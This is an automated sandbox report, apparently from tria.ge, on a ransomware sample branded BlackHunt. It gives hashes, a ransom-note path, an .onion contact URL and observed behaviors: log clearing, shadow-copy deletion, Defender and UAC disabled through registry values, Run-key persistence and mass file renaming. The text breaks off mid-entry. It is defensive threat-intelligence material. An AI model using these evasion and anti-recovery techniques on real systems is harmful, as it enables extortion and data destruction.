Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
145s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:15
Static task
static1
Behavioral task
behavioral1
Sample
49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe
Resource
win10v2004-20231215-en
General
-
Target
49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe
-
Size
707KB
-
MD5
2ea92a5b91741c10dbdb52626c4e486c
-
SHA1
c7dedaaf769d580c6bd8f4aa5d9299b5d7b59c77
-
SHA256
49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7
-
SHA512
7d52428843cfaf35b34f476e88e2c603814dc65cd769b90d468e2206011113ec9e0abc51e0ad196c25e15dae26c98df86d1633a6af86524557c80f3cf0443213
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1Q8Vvnh:6uaTmkZJ+naie5OTamgEoKxLWzRh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 6480 fsutil.exe 7960 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 6624 wevtutil.exe 6244 wevtutil.exe 8584 wevtutil.exe 7612 wevtutil.exe 8840 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 10940 bcdedit.exe 6760 bcdedit.exe 10484 bcdedit.exe 7484 bcdedit.exe -
Renames multiple (3353) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 6080 wbadmin.exe 11152 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" cmd.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\M: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\R: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\K: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\S: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\L: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\X: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\I: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\H: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\V: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Y: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\P: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\A: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\U: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\O: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\N: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\Q: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\T: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\J: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\G: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\Z: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened (read-only) \??\B: 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\vlc.mo 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\main-selector.css 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ar-ae\#BlackHunt_ReadMe.hta 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\libffi.md 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\#BlackHunt_ReadMe.hta 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\ja-jp\#BlackHunt_ReadMe.txt 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-variant2-2x.gif 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pl-pl\ui-strings.js 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.json 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_filter\#BlackHunt_ReadMe.hta 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\#BlackHunt_Private.key 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\#BlackHunt_ReadMe.txt 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\inline-error-2x.png 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\zipfs.jar 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\#BlackHunt_ReadMe.hta 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-tw_get.svg 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_fr_135x40.svg 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\tool-view.css 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\#BlackHunt_ReadMe.txt 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\uk-ua\ui-strings.js 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sv-se\#BlackHunt_Private.key 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\#BlackHunt_ReadMe.hta 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-fr\ui-strings.js 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\#BlackHunt_ReadMe.hta 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\rhp\#BlackHunt_ReadMe.txt 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\#BlackHunt_ReadMe.hta 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\#BlackHunt_ReadMe.hta 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\example_icons.png 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\#BlackHunt_ReadMe.txt 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\cs-cz\#BlackHunt_ReadMe.hta 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\es-es\#BlackHunt_ReadMe.txt 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\es-es\#BlackHunt_ReadMe.txt 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-right-pressed.gif 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-BoldIt.otf 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\cs-cz\ui-strings.js 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files\VideoLAN\VLC\plugins\lua\#BlackHunt_Private.key 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_listview_selected-hover.svg 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-gb\#BlackHunt_ReadMe.txt 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fr-ma\#BlackHunt_ReadMe.txt 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pt-br\#BlackHunt_ReadMe.hta 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-cn\#BlackHunt_Private.key 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\digsig_icons_2x.png 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons_ie8.gif 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\rhp_world_icon_hover_2x.png 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-ma\ui-strings.js 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_opencarat_18.svg 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pl-pl\#BlackHunt_ReadMe.hta 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hr-hr\#BlackHunt_ReadMe.txt 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\tool\#BlackHunt_Private.key 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner_mini.gif 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pt-br\#BlackHunt_ReadMe.hta 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int.gif 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\#BlackHunt_ReadMe.hta 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\en_get.svg 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\#BlackHunt_ReadMe.txt 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-ma\#BlackHunt_Private.key 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#BlackHunt_ReadMe.txt 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\locales\#BlackHunt_Private.key 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_anonymoususer_24.svg 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left-pressed.gif 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\text.cur 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\s_listview_18.svg 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 540 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5460 vssadmin.exe 9476 vssadmin.exe 5800 vssadmin.exe 840 vssadmin.exe 7260 vssadmin.exe 9124 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 11852 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 8944 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe Token: SeRestorePrivilege 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe Token: SeBackupPrivilege 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe Token: SeTakeOwnershipPrivilege 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe Token: SeAuditPrivilege 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe Token: SeSecurityPrivilege 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe Token: SeIncBasePriorityPrivilege 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe Token: SeBackupPrivilege 5812 vssvc.exe Token: SeRestorePrivilege 5812 vssvc.exe Token: SeAuditPrivilege 5812 vssvc.exe Token: SeBackupPrivilege 9084 wbengine.exe Token: SeRestorePrivilege 9084 wbengine.exe Token: SeSecurityPrivilege 9084 wbengine.exe Token: SeSecurityPrivilege 6624 wevtutil.exe Token: SeBackupPrivilege 6624 wevtutil.exe Token: SeSecurityPrivilege 6244 wevtutil.exe Token: SeBackupPrivilege 6244 wevtutil.exe Token: SeSecurityPrivilege 8584 wevtutil.exe Token: SeBackupPrivilege 8584 wevtutil.exe Token: SeSecurityPrivilege 7612 wevtutil.exe Token: SeBackupPrivilege 7612 wevtutil.exe Token: SeSecurityPrivilege 8840 wevtutil.exe Token: SeBackupPrivilege 8840 wevtutil.exe Token: SeDebugPrivilege 11852 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2832 wrote to memory of 4600 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 92 PID 2832 wrote to memory of 4600 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 92 PID 2832 wrote to memory of 2372 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 94 PID 2832 wrote to memory of 2372 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 94 PID 2832 wrote to memory of 4020 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 96 PID 2832 wrote to memory of 4020 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 96 PID 2832 wrote to memory of 4968 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 98 PID 2832 wrote to memory of 4968 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 98 PID 4600 wrote to memory of 3540 4600 cmd.exe 100 PID 4600 wrote to memory of 3540 4600 cmd.exe 100 PID 2832 wrote to memory of 2352 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 101 PID 2832 wrote to memory of 2352 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 101 PID 2372 wrote to memory of 516 2372 cmd.exe 103 PID 2372 wrote to memory of 516 2372 cmd.exe 103 PID 2832 wrote to memory of 5104 2832 